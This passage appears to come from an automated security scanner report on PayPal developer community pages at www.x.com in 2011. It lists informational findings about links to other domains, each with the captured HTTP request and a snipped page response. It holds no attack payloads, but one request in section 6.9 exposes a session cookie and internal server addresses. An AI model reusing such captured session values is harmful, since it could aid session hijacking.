"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.6. https://www.x.com/community/ppx/ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/ec?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b31342c323237363b31342c323031393b31342c323237303b31342c323031303b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:32 GMT; Path=/
Vary: User-Agent
JP: D=142774 t=1313157032019351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>Offer customers free <a href="https://www.paypal.com/ca/cgi-bin/webscr?cmd=xpt/Marketing_CommandDriven/general/PBPInfo-outside" title="PayPal Purchase Protection">PayPal Purchase Protection</a>
...[SNIP]...
<li>Take advantage of <a href="https://cms.paypal.com/ca/cgi-bin/marketingweb?cmd=_render-content&amp;content_ID=security/seller_protection#guides_for_safer_selling" title="PayPal Seller Protection">PayPal Seller Protection</a>
...[SNIP]...
<li>Modify your checkout flow to include <a href="https://www.paypal.com/express-checkout-buttons" title="PayPal Express Checkout buttons">PayPal Express Checkout buttons</a>
...[SNIP]...
<li>Test your integration using the <a href="https://developer.paypal.com/" title="PayPal Sandbox">PayPal Sandbox</a>
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=#mrQuali" title="When your monthly sales exceed $3,000 and you've been a PayPal member more than 90 days, please fill out a one-time application, subject to approval.">Merchant rate qualification required</a>
...[SNIP]...
<p>If your transactions typically average less than $10.00, you could save money with our "5% plus 5.." rate. For information, see <a href="https://micropayments.paypal-labs.com/" title="Micropayments">Micropayments</a>
...[SNIP]...
<p>There are fees for currency conversion and to receive payments from another country. For details, see our standard <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_display-fees-outside" title="fee structure">fee structure</a>
...[SNIP]...
<li>Guess (<a href="https://www.paypalobjects.com/en_US/Marketing/pdf/PayPal_GUESS_CS_final.pdf" target="_blank" title="Guess (PDF)">PDF</a>)</li><li>GoDaddy (<a href="https://www.paypalobjects.com/en_US/pdf/godaddyCaseStudy.pdf" target="_blank" title="GoDaddy (PDF)">PDF</a>)</li><li>TigerDirect (<a href="https://www.paypalobjects.com/en_US/pdf/tigerdirectCaseStudy.pdf" target="_blank" title="TigerDirect (PDF)">PDF</a>)</li><li>OnlineShoes (<a href="https://www.paypalobjects.com/en_US/pdf/pp1350_online_com.pdf" target="_blank" title="OnlineShoes (PDF)">PDF</a>
...[SNIP]...
<p>For answers to frequent questions, go to our <a href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help" title="Help Center">Help Center</a>
...[SNIP]...
<li><a href="https://www.paypal-labs.com/integrationwizard/index.php" title="Express Checkout Integration Wizard">Express Checkout Integration Wizard</a>
...[SNIP]...
<li><a href="https://cms.paypal.com/cms_content/US/en_US/files/developer/PP_ExpressCheckout_IntegrationGuide.pdf" target="_blank" title="Express Checkout Integration Guide (PDF)">Express Checkout Integration Guide (PDF)</a>
...[SNIP]...
<li><a href="https://cms.paypal.com/cms_content/US/en_US/files/developer/PP_ExpressCheckout_IntegrationGuide_DG.pdf" target="_blank" title="Digital Goods Integration Guide - Express Checkout Edition (PDF)">Digital Goods Integration Guide - Express Checkout Edition (PDF)</a>
...[SNIP]...
<li><a href="https://cms.paypal.com/cms_content/US/en_US/files/developer/PP_ExpressCheckout_AdvancedFeaturesGuide.pdf" target="_blank" title="Express Checkout Advanced Features Guide (PDF)">Express Checkout Advanced Features Guide (PDF)</a>
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.7. https://www.x.com/community/ppx/global

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/global?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323032353b31342c323131343b31342c323033343b31342c323032333b31342c323133333b31342c323032343b31342c323036333b31342c323036343b31342c323032323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=60503 t=1313157067602217
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.8. https://www.x.com/community/ppx/showcase

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/showcase?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131343b31342c323033343b31342c323032353b31342c323032333b31342c323133333b31342c323032343b31342c323036333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=98163 t=1313157067253848
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<a href="http://www.odesk.com" title="oDesk.com"><img alt="Image: oDesk.com" src="https://www.paypal-portal.com/x_applications/img/logos/oDesk.png"/></a>
...[SNIP]...
<a href="http://www.blingnation.com" title="Bling Nation"><img alt="Image: Bling Nation" src="https://www.paypal-portal.com/x_applications/img/logos/Bling_Nation.jpg"/></a>
...[SNIP]...
<a href="http://www.indiegogo.com/" title="IndieGoGo"><img alt="Image: IndieGoGo" src="https://www.paypal-portal.com/x_applications/img/logos/IndieGoGo.png"/></a>
...[SNIP]...
<a href="http://www.iconcessionstand.com" title="iConcessionStand"><img alt="Image: iConcessionStand" src="https://www.paypal-portal.com/x_applications/img/logos/iconcessionstand.jpg"/></a>
...[SNIP]...
<a href="http://www.wooga.com/" title="Wooga"><img alt="Image: Wooga" src="https://www.paypal-portal.com/x_applications/img/logos/Wooga_VZ_Payment.png"/></a>
...[SNIP]...
<span style="font-size:10px; float:right; padding: 3px 5px 0 0;"><a href="https://www.paypal-portal.com/developer/x_applications/" title="Submit Here">.. Submit Here</a>
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.9. https://www.x.com/community/ppx/xspaces

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces?view=documents HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:39:50 GMT; Path=/
Vary: User-Agent
JP: D=171785 t=1313156390079353
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.10. https://www.x.com/community/ppx/xspaces/accelerator

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/accelerator

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/accelerator?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130303b31342c323232313b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=108978 t=1313157053716957
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.11. https://www.x.com/community/ppx/xspaces/certification

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/certification

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/certification?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=68710 t=1313157037638545
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<span style="font-size: 12pt; ">Find a developer in the <a class="jive-link-external-small" href="https://www.paypal-portal.com/developer/directory/">Certified Developer Directory</a>
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.12. https://www.x.com/community/ppx/xspaces/cloud-computing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/cloud-computing

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/cloud-computing?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131323b31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:39 GMT; Path=/
Vary: User-Agent
JP: D=120989 t=1313157039087320
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.13. https://www.x.com/community/ppx/xspaces/digital_goods

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/digital_goods

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/digital_goods?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:40 GMT; Path=/
Vary: User-Agent
JP: D=107217 t=1313157040199581
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.14. https://www.x.com/community/ppx/xspaces/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/finance

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/finance?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:41 GMT; Path=/
Vary: User-Agent
JP: D=134360 t=1313157041133758
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.15. https://www.x.com/community/ppx/xspaces/forums

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/forums

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/forums?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038343b31342c323036333b31342c323130303b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=183585 t=1313157053120279
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.16. https://www.x.com/community/ppx/xspaces/gaming

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/gaming

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/gaming?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b31342c323131323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:47 GMT; Path=/
Vary: User-Agent
JP: D=118887 t=1313157047288824
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
